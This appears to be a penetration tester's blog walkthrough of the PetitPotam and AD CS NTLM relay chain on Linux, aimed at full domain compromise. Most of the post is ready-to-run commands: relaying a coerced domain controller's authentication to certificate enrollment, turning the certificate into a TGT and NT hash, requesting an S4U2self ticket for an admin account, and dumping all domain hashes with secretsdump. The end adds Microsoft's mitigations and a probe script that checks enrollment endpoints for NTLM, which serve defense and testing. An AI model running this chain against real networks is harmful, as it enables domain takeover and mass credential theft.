PetitPotam and ADCS exploitation are nothing short of amazing. Exploitation is a breeze and results in full domain admin access.

PetitPotam coerces a domain controller into authenticating to a host you control, and ntlmrelayx relays that NTLM authentication to the AD CS web enrollment endpoint, which hands back a certificate for the DC's machine account. With those two TTPs, an attacker can hop on a network, coerce a DC, relay the authentication and walk away with the equivalent of local administrator on a domain controller in under 15 minutes. We haven't seen the Linux side of that chain written up end to end, so that's what we're going to do today.

Detecting the Vulnerability

Collect the following information before you start (the values used in the commands below are in parentheses):

  • The internal domain name (acme.org)
  • The hostname of a domain controller to coerce (DC01.acme.org)
  • The address of the AD CS server running Certificate Authority Web Enrollment (10.196.1.20)
  • The IP of your own machine, which ntlmrelayx listens on and which PetitPotam points the DC at

Once you have the above information, first test that one of the domain controllers is vulnerable to PetitPotam, i.e. that it can be coerced into authenticating to your machine:

[Screenshot: PetitPotam test 1]

If it is, awesome. Let’s push on to next steps.

Getting impacket

Once the vulnerability is confirmed, clone ExAndroidDev's fork of Impacket and switch to the correct branch:

git clone https://github.com/ExAndroidDev/impacket && \
cd impacket && \
git checkout ntlmrelayx-adcs-attack && \
pipenv --python 3 shell

Once in the virtual environment with the correct branch, install Impacket:

python3 setup.py install

Getting ntlmrelayx up and running

You can now execute the following command to start listening for inbound authentication attempts from the domain controller targeted with PetitPotam. --target is the CA's web enrollment URL and --template is the certificate template the relayed machine account enrolls in (DomainController is published by default on an enterprise CA):

python3 examples/ntlmrelayx.py -debug -smb2support --target http://10.196.1.20/certsrv/default.asp --template DomainController --adcs

Hit enter and you should see something similar to this:

[Screenshot: PetitPotam - ntlmrelayx listening for inbound authentication]

Getting the PFX

Execute PetitPotam again. ntlmrelayx receives the inbound authentication from the DC, relays it to the CA and prints a base64 encoded PFX blob containing the DC's certificate and private key:

[Screenshot: PetitPotam - ntlmrelayx receives an inbound request]

Copy the base64 output to a file for later use.

Installing PKINITtools

Now clone and install dirkjanm's PKINITtools:

git clone https://github.com/dirkjanm/PKINITtools && \
cd PKINITtools && \
pipenv --python 3 shell

After the python virtual environment is initialized, execute the following command to install the required packages:

pip3 install -r requirements.txt

Decoding the certificate

Using the Base64 blob you wrote to a file, decode its contents and write it to a separate file using a command similar to the one below:

base64 -d crt.pfx.b64 > crt.pfx

We have to do this by hand, even though dirkjanm's tooling appears to support Base64 PFX files. That's because we had issues with the functionality while using gettgtpkinit.py. It may work for you, though. Try it out.

Using gettgtpkinit.py

Using dirkjanm's gettgtpkinit.py, get your TGT:

python3 gettgtpkinit.py acme.org/DC01\$ -cert-pfx crt.pfx out.ccache

You need the following for the command to work:

  • The internal domain name (acme.org)
  • The machine account of the DC you coerced with PetitPotam: its hostname followed by $ (escape the $ with a backslash, otherwise the shell treats it as a variable)
  • The decoded PFX you just obtained from ntlmrelayx

After running the command above, you'll see output similar to what is shown below and receive the TGT in the ccache file you specified. Note the AS-REP encryption key it prints; you need it in the next step:

[Screenshot: gettgtpkinit.py output - TGT received]

Getting the NT hash

Save this output and ccache file. We’ll use it to access the domain controller we attacked. Execute the following command to get the NT hash for the domain controller:

KRB5CCNAME=out.ccache python3 getnthash.py acme.org/DC01\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773

You need the following for the command to work:

  • The internal domain name (acme.org)
  • The machine account of the DC you coerced with PetitPotam (hostname plus $, with the $ escaped)
  • The generated AS-REP key you got from gettgtpkinit.py
  • The generated TGT ccache file you got from gettgtpkinit.py

After you hit enter, you’ll pull the NT hash for the target domain controller:

[Screenshot: getnthash.py output - NT hash of the target domain controller]

This is awesome because we can now authenticate to the domain as the DC's machine account. That account is a member of Domain Controllers and can already replicate the directory, so a DCSync with this hash alone would work. We still want to impersonate domain administrators and perform other attacks, though, so next we use the DC's TGT to request a service ticket on behalf of an administrator via S4U2self (this is not a forged silver ticket: the KDC issues it).

Finding a user to impersonate

First, let’s grab a list of administrator users using the hash above and crackmapexec:

crackmapexec ldap DC01.acme.org -u DC01\$ -H 2cf2e96d892263276b95861017e2ce27 --admin-count

You need the following for the command to work:

  • The NT hash you just extracted
  • The hostname of the domain controller you’re targeting
  • Crackmapexec installed

Following the execution of this command, you’ll now have a list of users and groups with administrative permissions in the domain. One of the accounts in our output is listed below:

  • VeeamBackup

Silver Surfing

This account most likely has local administrator access to the domain controllers and other servers on the network. Let's use the DC's machine account TGT to obtain a service ticket for cifs/DC01.acme.org on behalf of this user (S4U2self) and start authenticating to services.

dirkjanm's command for doing this is quite long, so I've included it below for easy copy and paste:

KRB5CCNAME=out.ccache python3 gets4uticket.py kerberos+ccache://acme.org\\DC01\$:out.ccache@DC01.acme.org cifs/DC01.acme.org@acme.org VeeamBackup@acme.org VeeamBackup.ccache -v

Note that you need the following for the command to work:

  • The hostname of the domain controller you’re targeting
  • The generated ccache file you got from gettgtpkinit.py
  • A user to target and pull a silver ticket for
  • The internal domain name

Getting everything

After executing this command, you have a ccache file for the account VeeamBackup. Because the DC's own machine account requested it, the ticket is for a service on that DC, and you can use it to authenticate to the same domain controller as VeeamBackup. For example, from the Impacket checkout, you can now execute secretsdump:

KRB5CCNAME=VeeamBackup.ccache python3 examples/secretsdump.py -just-dc-ntlm -user-status -debug -k acme.org/VeeamBackup@DC01.acme.org -no-pass -outputfile DC01.acme.org.secretsdump

Wrap up

When this is all said and done, you get domain admin in 20 minutes or less. This is beyond devastating and honestly the biggest exploitation path since ETERNALBLUE in our opinion.

We’ve already used this TTP on engagements, and I can tell you right now, it basically feels like cheating.

Make sure to use this article to exploit and report on these vulnerabilities as soon as possible. Let your customers know the risk and ensure they understand the speed in which you were able to take over their network.

To mitigate this attack chain, put the following controls in place (they come from Microsoft's KB5005413):

  • Enable EPA and require SSL for Certificate Authority Web Enrollment (the CertSrv application) in IIS on internal certificate authority servers
  • Enable EPA and require SSL for Certificate Enrollment Web Service in IIS on internal certificate authority servers
  • Disable NTLM for Internet Information Services (IIS) on AD CS servers running Certificate Authority Web Enrollment or Certificate Enrollment Web Service, so that only Kerberos (the Negotiate:Kerberos provider) remains
  • Disable NTLM authentication on your Windows domain controllers (pipe dream, we know)
  • Implement LDAP signing and channel binding wherever possible; this does not protect the AD CS HTTP endpoint, but it closes the equivalent relay of coerced DC authentication to LDAP

These recommendations come from Microsoft. Be precise about what they stop: the coercion itself still happens, but with EPA enforced the CA rejects the relayed NTLM authentication and the chain dies at that point.
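A quick way, from the same Linux box, to see whether a web enrollment endpoint still offers NTLM: useful both as a pre-flight check before the relay in the steps above and as a verification after the IIS mitigation has been applied. This is an added example, not code from the original post or from Microsoft's KB. The CertSrv URL and the sample 401 response are constructed for illustration, and the check has a limit worth stating: EPA itself is not visible in any header, so the probe only tells you which schemes IIS advertises and whether the endpoint is reachable over plain HTTP.

```shell
#!/bin/sh
# Probe an AD CS web enrollment URL for the authentication schemes IIS offers.
# Added example; the sample response below is constructed, not captured.
set -eu

# Print the scheme token of every WWW-Authenticate header on stdin, one per line.
auth_schemes() {
    tr -d '\r' | grep -i '^www-authenticate:' | sed 's/^[^:]*:[[:space:]]*//' | awk '{ print $1 }'
}

# Classify the response headers on stdin:
#   ntlm            NTLM advertised outright: ntlmrelayx --adcs has a target
#   negotiate-only  SPNEGO only; this still falls back to NTLM unless the IIS
#                   provider list was cut down to Negotiate:Kerberos per KB5005413
#   none            no Windows authentication offered (or not a 401 at all)
ntlm_state() {
    schemes=$(auth_schemes)
    if printf '%s\n' "$schemes" | grep -qi '^ntlm$'; then
        echo ntlm
    elif printf '%s\n' "$schemes" | grep -qi '^negotiate$'; then
        echo negotiate-only
    else
        echo none
    fi
}

# Anonymous request to the enrollment page; -D - dumps the response headers.
# Plain http:// is reported as well: EPA's channel binding needs TLS, which is
# why the KB pairs "Extended Protection: Required" with "Require SSL".
probe() {
    url=$1
    case "$url" in
        http://*) printf '[-] %s is plain HTTP: EPA cannot bind this channel, require SSL\n' "$url" ;;
    esac
    hdrs=$(curl -sS --max-time 10 -o /dev/null -D - "$url") || {
        printf '[-] %s unreachable\n' "$url"; return 1; }
    printf '[*] %s offers: %s\n' "$url" "$(printf '%s\n' "$hdrs" | ntlm_state)"
}

# Constructed sample of what an unhardened CertSrv site answers to an anonymous request.
sample_headers() {
    printf 'HTTP/1.1 401 Unauthorized\r\n'
    printf 'Server: Microsoft-IIS/10.0\r\n'
    printf 'WWW-Authenticate: Negotiate\r\n'
    printf 'WWW-Authenticate: NTLM\r\n'
    printf 'Content-Length: 1293\r\n\r\n'
}

# usage: ./certsrv_probe.sh http://10.196.1.20/certsrv/ [more URLs]
# With no URLs, classify the constructed sample so the script also runs offline.
if [ "$#" -gt 0 ]; then
    for u in "$@"; do probe "$u" || :; done
else
    printf 'sample 401 classifies as: %s\n' "$(sample_headers | ntlm_state)"
fi
```

Read "negotiate-only" carefully: it is the state you should see after the IIS providers have been trimmed to Negotiate:Kerberos, but from the outside it is indistinguishable from a default Negotiate provider that will still hand out NTLM when Kerberos is not possible (for example when the relay targets an IP address). The definitive test for that case remains pointing ntlmrelayx at the endpoint in a lab and watching it fail.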

Shout-outs and references

A lot of this article was cribbed from the work done by dirkjanm (Dirk-jan Mollema). See more in his article:

NTLM relaying to AD CS - On certificates, printers and a little hippo
https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/

ExAndroidDev's fork of Impacket is a pivotal part of this attack, and their guide walks through the relay to AD CS with it:

AD CS relay attack - practical guide
https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/

Remediation recommendations are taken straight from the horse’s mouth (Microsoft):

KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)
https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429

Of course we can't forget the work from SpecterOps on AD CS, which is the research the certificate template abuse here builds on:

Certified Pre-Owned: Abusing Active Directory Certificate Services
https://posts.specterops.io/certified-pre-owned-d95910965cd2